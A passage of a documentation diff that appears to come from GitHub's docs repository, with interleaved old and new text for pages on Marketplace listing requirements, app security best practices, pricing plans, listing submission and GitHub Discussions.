variables.product.prodname_marketplace %} Developer Agreement](/articles/github-marketplace-developer-agreement/)." - {% data variables.product.prodname_github_app %}s should have a minimum of 100 installations. - {% data variables.product.prodname_oauth_app %}s should have a minimum of 200 users. #### User experience requirements for all apps All listings should meet the following requirements, regardless of whether they are for a free or paid app. - Listings must not actively persuade users away from {% data variables.product.product_name %}. - Listings must include valid contact information for the publisher. - Listings must have a relevant description of the application. - Listings must specify a pricing plan. - Apps must provide value to customers and integrate with the platform in some way beyond authentication. - Apps must be publicly available in {% data variables.product.prodname_marketplace %} and cannot be in beta or available by invite only. - Apps cannot actively persuade users away from {% data variables.product.product_name %}. - Marketing materials for the app must accurately represent the app's behavior. - Apps must include links to user-facing documentation that describe how to set up and use the app. - When a customer purchases an app and GitHub redirects them to the app's installation URL, the app must begin the OAuth flow immediately. For details, see "[Handling new purchases and free trials](/marketplace/integrating-with-the-github-marketplace-api/handling-new-purchases-and-free-trials/#step-3-authorization)." - Apps must have webhook events set up to notify the publisher of any plan changes or cancellations using the {% data variables.product.prodname_marketplace %} API. For more information, see "[Using the {% data variables.product.prodname_marketplace %} API in your app](/developers/github-marketplace/using-the-github-marketplace-api-in-your-app)." - Customers must be able to install your app and select repositories on both a personal and organization account. They should be able to view and manage those accounts separately. For more information on providing a good customer experience, see "[Customer experience best practices for apps](/developers/github-marketplace/customer-experience-best-practices-for-apps)." ### Brand and listing #### Brand and listing requirements for all apps - Apps that use GitHub logos must follow the "[{% data variables.product.product_name %} Logos and Usage](https://github.com/logos)" guidelines. - Apps that use GitHub logos must follow the {% data variables.product.company_short %} guidelines. For more information, see "[{% data variables.product.company_short %} Logos and Usage](https://github.com/logos)." - Apps must have a logo, feature card, and screenshots images that meet the recommendations provided in "[Writing {% data variables.product.prodname_marketplace %} listing descriptions](/marketplace/listing-on-github-marketplace/writing-github-marketplace-listing-descriptions/)." - Listings must include descriptions that are well written and free of grammatical errors. For guidance in writing your listing, see "[Writing {% data variables.product.prodname_marketplace %} listing descriptions](/marketplace/listing-on-github-marketplace/writing-github-marketplace-listing-descriptions/)." ### Security To protect your customers, we recommend that you also follow security best practices. For more information, see "[Security best practices for apps](/developers/github-marketplace/security-best-practices-for-apps)." ### Considerations for free apps Apps will go through a security review before being listed on {% data variables.product.prodname_marketplace %}. A successful review will meet the requirements and follow the security best practices listed in "[Security review process](/marketplace/getting-started/security-review-process/)." For information on the review process, contact [marketplace@github.com](mailto:marketplace@github.com). {% data reusables.marketplace.free-apps-encouraged %} ### Requirements for paid apps In addition to the requirements for all apps above, each app that you offer as a paid service on {% data variables.product.prodname_marketplace %} must also meet the following requirements: - {% data variables.product.prodname_github_app %}s should have a minimum of 100 installations. - {% data variables.product.prodname_oauth_app %}s should have a minimum of 200 users. - All paid apps must handle {% data variables.product.prodname_marketplace %} purchase events for new purchases, upgrades, downgrades, cancellations, and free trials. For more information, see "[Billing requirements for paid apps](#billing-requirements-for-paid-apps)" below. - Publishing organizations must have a verified domain and must enable two-factor authentication. For more information, see "[Requiring two-factor authentication in your organization](/github/setting-up-and-managing-organizations-and-teams/requiring-two-factor-authentication-in-your-organization.") ### Billing flows When you are ready to publish the app on {% data variables.product.prodname_marketplace %} you must request verification for the listing. Your app must integrate [billing flows](/marketplace/integrating-with-the-github-marketplace-api/#billing-flows) using the [{% data variables.product.prodname_marketplace %} webhook event](/marketplace/integrating-with-the-github-marketplace-api/github-marketplace-webhook-events/). {% note %} #### Free apps The verification process is open to organizations. {% data reusables.marketplace.app-transfer-to-org-for-verification %} For information on how to do this, see: "[Submitting your listing for publication](/developers/github-marketplace/submitting-your-listing-for-publication#transferring-an-app-to-an-organization-before-you-submit)." {% data reusables.marketplace.free-apps-encouraged %} If you are listing a free app, you'll need to meet these requirements: {% endnote %} - Customers must be able to see that they have a free plan in the billing, profile, or account settings section of the app. - When a customer cancels your app, you must follow the flow for [cancelling plans](/marketplace/integrating-with-the-github-marketplace-api/cancelling-plans/). ### Billing requirements for paid apps #### Paid apps Your app does not need to handle payments but does need to use {% data variables.product.prodname_marketplace %} purchase events to manage new purchases, upgrades, downgrades, cancellations, and free trials. For information about how integrate these events into your app, see "[Using the {% data variables.product.prodname_marketplace %} API in your app](/developers/github-marketplace/using-the-github-marketplace-api-in-your-app)." To offer your app as a paid service, you'll need to meet these requirements to list your app on {% data variables.product.prodname_marketplace %}: Using GitHub's billing API allows customers to purchase an app without leaving GitHub and to pay for the service with the payment method already attached to their {% data variables.product.product_name %} account. - To sell your app in {% data variables.product.prodname_marketplace %}, it must use GitHub's billing system. Your app does not need to handle payments but does need to use "[{% data variables.product.prodname_marketplace %} purchase events](/marketplace/integrating-with-the-github-marketplace-api/github-marketplace-webhook-events/)" to manage new purchases, upgrades, downgrades, cancellations, and free trials. See "[Billing flows](/marketplace/integrating-with-the-github-marketplace-api/#billing-flows)" to learn about how to integrate these events into your app. Using GitHub's billing system allows customers to purchase an app without leaving GitHub and pay for the service with the payment method already attached to their {% data variables.product.product_name %} account. - Apps must support both monthly and annual billing for paid subscriptions purchases. - Listings may offer any combination of free and paid plans. Free plans are optional but encouraged. For more information, see "[Setting a {% data variables.product.prodname_marketplace %} listing's pricing plan](/marketplace/listing-on-github-marketplace/setting-a-github-marketplace-listing-s-pricing-plan/)." {% data reusables.marketplace.marketplace-billing-ui-requirements %} 60 content/developers/github-marketplace/security-best-practices-for-apps.md @@ -0,0 +1,60 @@ --- title: Security best practices for apps intro: 'Guidelines for preparing a secure app to share on {% data variables.product.prodname_marketplace %}.' redirect_from: - /apps/marketplace/getting-started/security-review-process/ - /marketplace/getting-started/security-review-process - /developers/github-marketplace/security-review-process-for-submitted-apps shortTitle: Security best practice versions: free-pro-team: '*' --- If you follow these best practices it will help you to provide a secure user experience. ### Authorization, authentication, and access control We recommend creating a GitHub App rather than an OAuth App. {% data reusables.marketplace.github_apps_preferred %}. See "[Differences between GitHub Apps and OAuth Apps](/apps/differences-between-apps/)" for more details. - Apps should use the principle of least privilege and should only request the OAuth scopes and GitHub App permissions that the app needs to perform its intended functionality. For more information, see [Principle of least privilege](https://en.wikipedia.org/wiki/Principle_of_least_privilege) in Wikipedia. - Apps should provide customers with a way to delete their account, without having to email or call a support person. - Apps should not share tokens between different implementations of the app. For example, a desktop app should have a separate token from a web-based app. Individual tokens allow each app to request the access needed for GitHub resources separately. - Design your app with different user roles, depending on the functionality needed by each type of user. For example, a standard user should not have access to admin functionality, and billing managers might not need push access to repository code. - Apps should not share service accounts such as email or database services to manage your SaaS service. - All services used in your app should have unique login and password credentials. - Admin privilege access to the production hosting infrastructure should only be given to engineers and employees with administrative duties. - Apps should not use personal access tokens to authenticate and should authenticate as an [OAuth App](/apps/about-apps/#about-oauth-apps) or a [GitHub App](/apps/about-apps/#about-github-apps): - OAuth Apps should authenticate using an [OAuth token](/apps/building-oauth-apps/authorizing-oauth-apps/). - GitHub Apps should authenticate using either a [JSON Web Token (JWT)](/apps/building-github-apps/authenticating-with-github-apps/#authenticating-as-a-github-app), [OAuth token](/apps/building-github-apps/identifying-and-authorizing-users-for-github-apps/), or [installation access token](/apps/building-github-apps/authenticating-with-github-apps/#authenticating-as-an-installation). ### Data protection - Apps should encrypt data transferred over the public internet using HTTPS, with a valid TLS certificate, or SSH for Git. - Apps should store client ID and client secret keys securely. We recommend storing them as [environmental variables](http://en.wikipedia.org/wiki/Environment_variable#Getting_and_setting_environment_variables). - Apps should delete all GitHub user data within 30 days of receiving a request from the user, or within 30 days of the end of the user's legal relationship with GitHub. - Apps should not require the user to provide their GitHub password. - Apps should encrypt tokens, client IDs, and client secrets. ### Logging and monitoring Apps should have logging and monitoring capabilities. App logs should be retained for at least 30 days and archived for at least one year. A security log should include: - Authentication and authorization events - Service configuration changes - Object reads and writes - All user and group permission changes - Elevation of role to admin - Consistent timestamping for each event - Source users, IP addresses, and/or hostnames for all logged actions ### Incident response workflow To provide a secure experience for users, you should have a clear incident response plan in place before listing your app. We recommend having a security and operations incident response team in your company rather than using a third-party vendor. You should have the capability to notify {% data variables.product.product_name %} within 24 hours of a confirmed incident. For an example of an incident response workflow, see the "Data Breach Response Policy" on the [SANS Institute website](https://www.sans.org/information-security-policy/). A short document with clear steps to take in the event of an incident is more valuable than a lengthy policy template. ### Vulnerability management and patching workflow You should conduct regular vulnerability scans of production infrastructure. You should triage the results of vulnerability scans and define a period of time in which you agree to remediate the vulnerability. If you are not ready to set up a full vulnerability management program, it's useful to start by creating a patching process. For guidance in creating a patch management policy, see this TechRepublic article "[Establish a patch management policy](https://www.techrepublic.com/blog/it-security/establish-a-patch-management-policy-87756/)." 94 ...ent/developers/github-marketplace/security-review-process-for-submitted-apps.md This file was deleted. 53 content/developers/github-marketplace/setting-pricing-plans-for-your-listing.md @@ -1,6 +1,6 @@ --- title: Setting pricing plans for your listing intro: 'When [listing your app on {% data variables.product.prodname_marketplace %}](/marketplace/listing-on-github-marketplace/), you can choose to provide your app as a free service or sell your app. If you plan to sell your app, you can create different pricing plans for different feature tiers.' intro: 'When you list your app on {% data variables.product.prodname_marketplace %}, you can choose to provide your app as a free service or sell your app. If you plan to sell your app, you can create different pricing plans for different feature tiers.' redirect_from: - /apps/adding-integrations/managing-pricing-and-payments-for-a-github-marketplace-listing/setting-a-github-marketplace-listing-s-pricing-plan/ - /apps/marketplace/managing-pricing-and-payments-for-a-github-marketplace-listing/setting-a-github-marketplace-listing-s-pricing-plan/ @@ -17,57 +17,52 @@ versions: free-pro-team: '*' --- ### About setting pricing plans If you want to sell an app on {% data variables.product.prodname_marketplace %}, you need to request verification when you publish the listing for your app. During the verification process, an onboarding expert checks the organization's identity and security settings. The onboarding expert will also take the organization through financial onboarding. For more information, see: "[Requirements for listing an app on {% data variables.product.prodname_marketplace %}](/marketplace/getting-started/requirements-for-listing-an-app-on-github-marketplace/)." ### Creating pricing plans To learn about the types of pricing plans that {% data variables.product.prodname_marketplace %} offers, see "[{% data variables.product.prodname_marketplace %} Pricing Plans](/marketplace/selling-your-app/github-marketplace-pricing-plans/)." You'll also find helpful billing guidelines in "[Selling your app](/marketplace/selling-your-app/)." Pricing plans can be in the draft or published state. If you haven't submitted your {% data variables.product.prodname_marketplace %} listing for approval, a published listing will function the same way as draft listings until your app is approved and listed on {% data variables.product.prodname_marketplace %}. Draft listings allow you to create and save new pricing plans without making them available on your {% data variables.product.prodname_marketplace %} listing page. Once you publish the pricing plan, it's available for customers to purchase immediately. You can publish up to 10 pricing plans. {% data reusables.marketplace.app-transfer-to-org-for-verification %} For information on how to do this, see: "[Submitting your listing for publication](/developers/github-marketplace/submitting-your-listing-for-publication#transferring-an-app-to-an-organization-before-you-submit)." To create a pricing plan for your {% data variables.product.prodname_marketplace %} listing, click **Plans and pricing** in the left sidebar of your [{% data variables.product.prodname_marketplace %} listing page](https://github.com/marketplace/manage). If you haven't created a {% data variables.product.prodname_marketplace %} listing yet, read "[Creating a draft {% data variables.product.prodname_marketplace %} listing](/marketplace/listing-on-github-marketplace/creating-a-draft-github-marketplace-listing/)" to learn how. When you click **New draft plan**, you'll see a form that allows you to customize your pricing plan. You'll need to configure the following fields to create a pricing plan: {% data variables.product.prodname_marketplace %} offers several different types of pricing plan. For detailed information, see "[Pricing plans for {% data variables.product.prodname_marketplace %}](/developers/github-marketplace/pricing-plans-for-github-marketplace-apps)." #### Plan name ### About saving pricing plans Your pricing plan's name will appear on your {% data variables.product.prodname_marketplace %} app's landing page. You can customize the name of your pricing plan to align to the plan's resources, the size of the company that will use the plan, or anything you'd like. You can save pricing plans in a draft or published state. If you haven't submitted your {% data variables.product.prodname_marketplace %} listing for approval, a published plan will function in the same way as a draft plan until your listing is approved and shown on {% data variables.product.prodname_marketplace %}. Draft plans allow you to create and save new pricing plans without making them available on your {% data variables.product.prodname_marketplace %} listing page. Once you publish a pricing plan on a published listing, it's available for customers to purchase immediately. You can publish up to 10 pricing plans. #### Pricing models For guidelines on billing customers, see "[Billing customers](/developers/github-marketplace/billing-customers)." ##### Free plans {% data reusables.marketplace.free-apps-encouraged %} A free plan still requires you to handle [new purchase](/marketplace/integrating-with-the-github-marketplace-api/handling-new-purchases-and-free-trials/) and [cancellation](/marketplace/integrating-with-the-github-marketplace-api/cancelling-plans/) billing flows. See "[Billing flows](/marketplace/integrating-with-the-github-marketplace-api/#billing-flows)" for more details. ##### Flat-rate plans ### Creating pricing plans Flat-rate pricing plans allow you to offer your service to customers for a flat-rate fee. {% data reusables.marketplace.marketplace-pricing-free-trials %} To create a pricing plan for your {% data variables.product.prodname_marketplace %} listing, click **Plans and pricing** in the left sidebar of your [{% data variables.product.prodname_marketplace %} listing page](https://github.com/marketplace/manage). For more information, see "[Creating a draft {% data variables.product.prodname_marketplace %} listing](/marketplace/listing-on-github-marketplace/creating-a-draft-github-marketplace-listing/)." You must set a price for both monthly and yearly subscriptions in U.S. Dollars for flat-rate plans. When you click **New draft plan**, you'll see a form that allows you to customize your pricing plan. You'll need to configure the following fields to create a pricing plan: ##### Per-unit plans - **Plan name** - Your pricing plan's name will appear on your {% data variables.product.prodname_marketplace %} app's landing page. You can customize the name of your pricing plan to align with the plan's resources, the size of the company that will use the plan, or anything you'd like. Per-unit pricing allows you to offer your app in units. For example, a unit can be a person, seat, or user. You'll need to provide a name for the unit and set a price for both monthly and yearly subscriptions, in U.S. Dollars. - **Pricing models** - There are three types of pricing plan: free, flat-rate, and per-unit. All plans require you to process new purchase and cancellation events from the marketplace API. In addition, for paid plans: #### Available for - You must set a price for both monthly and yearly subscriptions in US dollars. - Your app must process plan change events. - You must request verification to publish a listing with a paid plan. - {% data reusables.marketplace.marketplace-pricing-free-trials %} {% data variables.product.prodname_marketplace %} pricing plans can apply to **Personal and organization accounts**, **Personal accounts only**, or **Organization accounts only**. For example, if your pricing plan is per-unit and provides multiple seats, you would select **Organization accounts only** because there is no way to assign seats to people in an organization from a personal account. For detailed information, see "[Pricing plans for {% data variables.product.prodname_marketplace %} apps](/developers/github-marketplace/pricing-plans-for-github-marketplace-apps)" and "[Using the {% data variables.product.prodname_marketplace %} API in your app](/developers/github-marketplace/using-the-github-marketplace-api-in-your-app)." #### Short description - **Available for** - {% data variables.product.prodname_marketplace %} pricing plans can apply to **Personal and organization accounts**, **Personal accounts only**, or **Organization accounts only**. For example, if your pricing plan is per-unit and provides multiple seats, you would select **Organization accounts only** because there is no way to assign seats to people in an organization from a personal account. Write a brief summary of the details of the pricing plan. The description might include the type of customer the plan is intended for or the resources the plan includes. - **Short description** - Write a brief summary of the details of the pricing plan. The description might include the type of customer the plan is intended for or the resources the plan includes. #### Bullets - **Bullets** - You can write up to four bullets that include more details about your pricing plan. The bullets might include the use cases of your app or list more detailed information about the resources or features included in the plan. You can write up to four bullets that include more details about your pricing plan. The bullets might include the use cases of your app or list more detailed information about the resources or features included in the plan. {% data reusables.marketplace.free-plan-note %} ### Changing a {% data variables.product.prodname_marketplace %} listing's pricing plan If a pricing plan for your {% data variables.product.prodname_marketplace %} plan is no longer needed or if you need to adjust pricing details, you can remove it. If a pricing plan for your {% data variables.product.prodname_marketplace %} listing is no longer needed, or if you need to adjust pricing details, you can remove it.  Once you publish a pricing plan for an app already listed in the {% data variables.product.prodname_marketplace %}, you can't make changes to the plan. Instead, you'll need to remove the pricing plan. Customers who already purchased the removed pricing plan will continue to use it until they opt out and move onto a new pricing plan. For more on pricing plans, see "[{% data variables.product.prodname_marketplace %} pricing plans](/marketplace/selling-your-app/github-marketplace-pricing-plans/)." Once you publish a pricing plan for an app that is already listed in {% data variables.product.prodname_marketplace %}, you can't make changes to the plan. Instead, you'll need to remove the pricing plan and create a new plan. Customers who already purchased the removed pricing plan will continue to use it until they opt out and move onto a new pricing plan. For more on pricing plans, see "[{% data variables.product.prodname_marketplace %} pricing plans](/marketplace/selling-your-app/github-marketplace-pricing-plans/)." Once you remove a pricing plan, users won't be able to purchase your app using that plan. Existing users on the removed pricing plan will continue to stay on the plan until they cancel their plan subscription. 37 content/developers/github-marketplace/submitting-your-listing-for-publication.md @@ -0,0 +1,37 @@ --- title: Submitting your listing for publication intro: 'You can submit your listing for the {% data variables.product.prodname_dotcom %} community to use.' redirect_from: - /marketplace/listing-on-github-marketplace/submitting-your-listing-for-review - /developers/github-marketplace/submitting-your-listing-for-review versions: free-pro-team: '*' --- Once you've completed the listing for your app, you'll see two buttons that allow you to request publication of the listing with or without verification. The **Request** button for "Publish without verification" is disabled if you have published any paid pricing plans in the listing.  {% data reusables.marketplace.launch-with-free %} After you submit your listing for review, an onboarding expert will reach out to you with additional information. For an overview of the process for creating and submitting a listing, see "[About {% data variables.product.prodname_marketplace %}](/developers/github-marketplace/about-github-marketplace#publishing-an-app-to-github-marketplace)." ### Prerequisites for publishing with verification Before you request verification of your listing, you'll need to integrate the {% data variables.product.prodname_marketplace %} billing flows and webhook into your app. For more information, see "[Using the {% data variables.product.prodname_marketplace %} API in your app](/developers/github-marketplace/using-the-github-marketplace-api-in-your-app)." If you've met the requirements for listing and you've integrated with the {% data variables.product.prodname_marketplace %} API, go ahead and submit your listing. For more information, see "[Requirements for listing an app](/developers/github-marketplace/requirements-for-listing-an-app)." {% data reusables.marketplace.app-transfer-to-org-for-verification %} For information on how to do this, see: "[Transferring an app to an organization before you submit](#transferring-an-app-to-an-organization-before-you-submit)" below. ### Transferring an app to an organization before you submit You cannot sell an app that's owned by a user account. You need to transfer the app to an organization that is already a verified creator, or that can request verification for a listing for the app. For details, see: 1. "[Creating an organization from scratch](/github/setting-up-and-managing-organizations-and-teams/creating-a-new-organization-from-scratch)" 1. "[Transferring ownership of a GitHub App](/developers/apps/transferring-ownership-of-a-github-app)" or "[Transferring ownership of an OAuth App](/developers/apps/transferring-ownership-of-an-oauth-app)" 22 content/developers/github-marketplace/submitting-your-listing-for-review.md This file was deleted. 4 content/developers/github-marketplace/testing-your-app.md @@ -1,6 +1,6 @@ --- title: Testing your app intro: 'GitHub recommends testing your app with APIs and webhooks before submitting your listing to {% data variables.product.prodname_marketplace %} so you can provide an ideal experience for customers. Before the {% data variables.product.prodname_marketplace %} onboarding team approves your app, it must adequately handle the [billing flows](/marketplace/integrating-with-the-github-marketplace-api/#billing-flows).' intro: 'GitHub recommends testing your app with APIs and webhooks before submitting your listing to {% data variables.product.prodname_marketplace %} so you can provide an ideal experience for customers. Before an onboarding expert approves your app, it must adequately handle the billing flows.' redirect_from: - /apps/marketplace/testing-apps-apis-and-webhooks/ - /apps/marketplace/integrating-with-the-github-marketplace-api/testing-github-marketplace-apps/ @@ -13,7 +13,7 @@ versions: ### Testing apps You can use a [draft {% data variables.product.prodname_marketplace %} listing](/marketplace/listing-on-github-marketplace/creating-a-draft-github-marketplace-listing/) to simulate each of the [billing flows](/marketplace/integrating-with-the-github-marketplace-api/#billing-flows). A listing in the draft state means that it has not been submitted for approval. Any purchases you make using a draft {% data variables.product.prodname_marketplace %} listing will _not_ create real transactions, and GitHub will not charge your credit card. You can use a draft {% data variables.product.prodname_marketplace %} listing to simulate each of the billing flows. A listing in the draft state means that it has not been submitted for approval. Any purchases you make using a draft {% data variables.product.prodname_marketplace %} listing will _not_ create real transactions, and GitHub will not charge your credit card. For more information, see "[Drafting a listing for your app](/developers/github-marketplace/drafting-a-listing-for-your-app)" and "[Using the {% data variables.product.prodname_marketplace %} API in your app](/developers/github-marketplace/using-the-github-marketplace-api-in-your-app)." #### Using a development app with a draft listing to test changes 2 .../developers/github-marketplace/webhook-events-for-the-github-marketplace-api.md @@ -1,6 +1,6 @@ --- title: Webhook events for the GitHub Marketplace API intro: 'A {% data variables.product.prodname_marketplace %} app receives information about changes to a user''s plan from the Marketplace purchase event webhook. A Marketplace purchase event is triggered when a user purchases, cancels, or changes their payment plan. For details on how to respond to each of these types of events, see "[Billing flows](/marketplace/integrating-with-the-github-marketplace-api/#billing-flows)."' intro: 'A {% data variables.product.prodname_marketplace %} app receives information about changes to a user''s plan from the Marketplace purchase event webhook. A Marketplace purchase event is triggered when a user purchases, cancels, or changes their payment plan.' redirect_from: - /apps/marketplace/setting-up-github-marketplace-webhooks/about-webhook-payloads-for-a-github-marketplace-listing/ - /apps/marketplace/integrating-with-the-github-marketplace-api/github-marketplace-webhook-events/ 4 content/developers/webhooks-and-events/webhook-events-and-payloads.md @@ -445,7 +445,7 @@ Key | Type | Description #### Webhook payload object {% data reusables.webhooks.installation_properties %} {% data reusables.webhooks.app_desc %} {% data reusables.webhooks.app_always_desc %} {% data reusables.webhooks.sender_desc %} #### Webhook payload example @@ -469,7 +469,7 @@ Key | Type | Description #### Webhook payload object {% data reusables.webhooks.installation_repositories_properties %} {% data reusables.webhooks.app_desc %} {% data reusables.webhooks.app_always_desc %} {% data reusables.webhooks.sender_desc %} #### Webhook payload example 54 ...ssions/collaborating-with-your-community-using-discussions/about-discussions.md @@ -0,0 +1,54 @@ --- title: About discussions intro: Use discussions to ask and answer questions, share information, make announcements, and conduct or participate in a conversation about a project on {% data variables.product.product_name %}. versions: free-pro-team: '*' --- {% data reusables.discussions.beta %} ### About discussions With {% data variables.product.prodname_discussions %}, the community for your project can create and participate in conversations within the project's repository. Discussions empower a project's maintainers, contributors, and visitors to gather and accomplish the following goals in a central location, without third-party tools. - Share announcements and information, gather feedback, plan, and make decisions - Ask questions, discuss and answer the questions, and mark the discussions as answered - Foster an inviting atmosphere for visitors and contributors to discuss goals, development, administration, and workflows  You don't need to close a discussion like you close an issue or a pull request. If a repository administrator or project maintainer enables discussions for a repository, anyone who visits the repository can create and participate in discussions for the repository. Repository administrators and project maintainers can manage discussions and discussion categories in a repository, and pin discussions to increase the visibility of the discussion. Moderators and collaborators can mark comments as answers, lock discussions, and convert issues to discussions. For more information, see "[Repository permission levels for an organization](/github/setting-up-and-managing-organizations-and-teams/repository-permission-levels-for-an-organization)." For more information about management of discussions for your repository, see "[Managing discussions in your repository](/discussions/managing-discussions-for-your-community/managing-discussions-in-your-repository)." ### About categories and formats for discussions {% data reusables.discussions.you-can-categorize-discussions %} {% data reusables.discussions.about-categories-and-formats %} {% data reusables.discussions.repository-category-limit %} For discussions with a question/answer format, an individual comment within the discussion can be marked as the discussion's answer. {% data reusables.discussions.github-recognizes-members %} For more information, see "[Managing categories for discussions in your repository](/discussions/managing-discussions-for-your-community/managing-categories-for-discussions-in-your-repository)." ### Best practices for discussions As a community member or maintainer, start a discussion to ask a question or discuss information that affects the community. For more information, see "[Collaborating with maintainers using discussions](/discussions/collaborating-with-your-community-using-discussions/collaborating-with-maintainers-using-discussions)." Participate in a discussion to ask and answer questions, provide feedback, and engage with the project's community. For more information, see "[Participating in a discussion](/discussions/collaborating-with-your-community-using-discussions/participating-in-a-discussion)." You can spotlight discussions that contain important, useful, or exemplary conversations among members in the community. For more information, see "[Managing discussions in your repository](/discussions/managing-discussions-for-your-community/managing-discussions-in-your-repository#pinning-a-discussion)." {% data reusables.discussions.you-can-convert-an-issue %} For more information, see "[Moderating discussions in your repository](/discussions/managing-discussions-for-your-community/moderating-discussions#converting-an-issue-to-a-discussion)." ### Sharing feedback You can share your feedback about {% data variables.product.prodname_discussions %} with {% data variables.product.company_short %}. To join the conversation, see [`github/feedback`](https://github.com/github/feedback/discussions?discussions_q=category%3A%22Discussions+Feedback%22). ### Further reading - "[About writing and formatting on {% data variables.product.prodname_dotcom %}](/github/writing-on-github/about-writing-and-formatting-on-github)" - "[Searching discussions](/github/searching-for-information-on-github/searching-discussions)" - "[About notifications](/github/managing-subscriptions-and-notifications-on-github/about-notifications)" - "[Moderating comments and conversations](/github/building-a-strong-community/moderating-comments-and-conversations)" - "[Maintaining your safety on {% data variables.product.prodname_dotcom %}](/github/building-a-strong-community/maintaining-your-safety-on-github)" 50 ...community-using-discussions/collaborating-with-maintainers-using-discussions.md @@ -0,0 +1,50 @@ --- title: Collaborating with maintainers using discussions shortTitle: Collaborating with maintainers intro: You can contribute to the goals, plans, health, and community for a project on {% data variables.product.product_name %} by communicating with the maintainers of the project in a discussion. permissions: People with read permissions to a repository can start and participate in discussions in the repository. versions: free-pro-team: '*' --- {% data reusables.discussions.beta %} ### About collaboration with maintainers using discussions {% data reusables.discussions.about-discussions %} If you use or contribute to a project, you can start a discussion to make suggestions and engage with maintainers and community members about your plans, questions, ideas, and feedback. For more information, see "[About discussions](/discussions/collaborating-with-your-community-using-discussions/about-discussions)." {% data reusables.discussions.about-categories-and-formats %} Repository administrators and project maintainers can delete a discussion. For more information, see "[Managing discussions in your repository](/discussions/managing-discussions-for-your-community/managing-discussions-in-your-repository#deleting-a-discussion)." {% data reusables.discussions.github-recognizes-members %} These members appear in a list of the most helpful contributors to the project's discussions. As your project grows, you can grant higher access permissions to active members of your community. For more information, see "[Granting higher permissions to top contributors](/discussions/guides/granting-higher-permissions-to-top-contributors)"  For more information about participation in discussions, see "[Participating in a discussion](/discussions/collaborating-with-your-community-using-discussions/participating-in-a-discussion)." ### Prerequisites To collaborate with maintainers using discussions, a repository administrator or project maintainer must enable discussions for the repository. For more information, see "[Enabling or disabling discussions for a repository](/github/administering-a-repository/enabling-or-disabling-github-discussions-for-a-repository)." ### Starting a discussion {% data reusables.discussions.starting-a-discussion %} ### Filtering the list of discussions You can search for discussions and filter the list of discussions in a repository. For more information, see "[Searching discussions](/github/searching-for-information-on-github/searching-discussions)." {% data reusables.repositories.navigate-to-repo %} {% data reusables.discussions.discussions-tab %} 1. In the **Search all discussions** field, type a search query. Optionally, to the right of the search field, click a button to further filter the results.  1. In the list of discussions, click the discussion you want to view.  ### Converting an issue to a discussion {% data reusables.discussions.you-can-convert-an-issue %} For more information, see "[Moderating discussions in your repository](/discussions/managing-discussions-for-your-community/moderating-discussions#converting-an-issue-to-a-discussion#converting-an-issue-to-a-discussion)." ### Further reading - "[About writing and formatting on {% data variables.product.prodname_dotcom %}](/github/writing-on-github/about-writing-and-formatting-on-github)" - "[Maintaining your safety on {% data variables.product.prodname_dotcom %}](/github/building-a-strong-community/maintaining-your-safety-on-github)" 14 content/discussions/collaborating-with-your-community-using-discussions/index.md @@ -0,0 +1,14 @@ --- title: Collaborating with your community using discussions shortTitle: Collaborating using discussions intro: Gather and discuss your project with community members and other maintainers. versions: free-pro-team: '*' --- {% data reusables.discussions.beta %} {% link_in_list /about-discussions %} {% link_in_list /participating-in-a-discussion %} {% link_in_list /collaborating-with-maintainers-using-discussions %} 31 ...borating-with-your-community-using-discussions/participating-in-a-discussion.md @@ -0,0 +1,31 @@ --- title: Participating in a discussion intro: You can converse with the community and maintainers in a forum within the repository for a project on {% data variables.product.product_name %}. permissions: People with read permissions to a repository can participate in discussions in the repository. versions: free-pro-team: '*' --- {% data reusables.discussions.beta %} ### About participation in a discussion {% data reusables.discussions.about-discussions %} For more information, see "[About discussions](/discussions/collaborating-with-your-community-using-discussions/about-discussions)." In addition to starting or viewing a discussion, you can comment in response to the original comment from the author of the discussion. You can also create a comment thread by replying to an individual comment that another community member made within the discussion, and react to comments with emoji. For more information about reactions, see "[About conversations on {% data variables.product.prodname_dotcom %}](/github/collaborating-with-issues-and-pull-requests/about-conversations-on-github#reacting-to-ideas-in-comments)." You can block users and report disruptive content to maintain a safe and pleasant environment for yourself on {% data variables.product.product_name %}. For more information, see "[Maintaining your safety on {% data variables.product.prodname_dotcom %}](/github/building-a-strong-community/maintaining-your-safety-on-github)." ### Prerequisites Discussions must be enabled for the repository for you to participate in a discussion in the repository. For more information, see "[Enabling or disabling discussions for a repository](/github/administering-a-repository/enabling-or-disabling-github-discussions-for-a-repository)." ### Creating a discussion {% data reusables.discussions.starting-a-discussion %} ### Marking a comment as an answer Discussion authors and users with the triage role or greater for a repository can mark a comment as the answer to a discussion in the repository. {% data reusables.discussions.marking-a-comment-as-an-answer %} 49 content/discussions/guides/best-practices-for-community-conversations-on-github.md @@ -0,0 +1,49 @@ --- title: Best practices for community conversations on GitHub shortTitle: Best practices for community conversations intro: 'You can use discussions to brainstorm with your team, and eventually move the conversation to a discussion when you are ready to scope out the work.' versions: free-pro-team: '*' --- {% data reusables.discussions.beta %} ### Community conversations in {% data variables.product.prodname_discussions %} Since {% data variables.product.prodname_discussions %} is an open forum, there is an opportunity to bring non-code collaboration into a project's repository and gather diverse feedback and ideas more quickly. You can help drive a productive conversation by: - Asking pointed questions and follow-up questions to garner specific feedback - Capture a diverse experience and distill it down to main points - Open an issue to take action based on the conversation, where applicable For more information about opening an issue and cross-referencing a discussion, see "[Opening an issue from a comment](/github/managing-your-work-on-github/opening-an-issue-from-a-comment)." ### Learning about conversations on GitHub You can create and participate in discussions, issues, and pull requests, depending on the type of conversation you'd like to have. You can use {% data variables.product.prodname_discussions %} to discuss big picture ideas, brainstorm, and spike out a project's specific details before committing it to an issue, which can then be scoped. Discussions are useful for teams if: - You are in the discovery phase of a project and are still learning which director your team wants to go in - You want to collect feedback from a wider community about a project - You want to keep bug fixes, feature requests, and general conversations separate Issues are useful for discussing specific details of a project such as bug reports and planned improvements. For more information, see "[About issues](/articles/about-issues)." Pull requests allow you to comment directly on proposed changes. For more information, see "[About pull requests](/articles/about-pull-requests)" and "[Commenting on a pull request](/articles/commenting-on-a-pull-request)." {% data reusables.organizations.team-discussions-purpose %} For more information, see "[About team discussions](/articles/about-team-discussions)." ### Following contributing guidelines Before you open a discussion, check to see if the repository has contributing guidelines. The CONTRIBUTING file includes information about how the repository maintainer would like you to contribute ideas to the project. For more information, see "[Setting up your project for healthy contributions](/github/building-a-strong-community/setting-up-your-project-for-healthy-contributions)." ### Next steps To continue learning about {% data variables.product.prodname_discussions %} and quickly create a discussion for your community, see "[Quickstart for {% data variables.product.prodname_discussions %}](/discussions/quickstart)." ### Further reading - "[Setting up your project for healthy contributions](/articles/setting-up-your-project-for-healthy-contributions)" - "[Using templates to encourage useful issues and pull 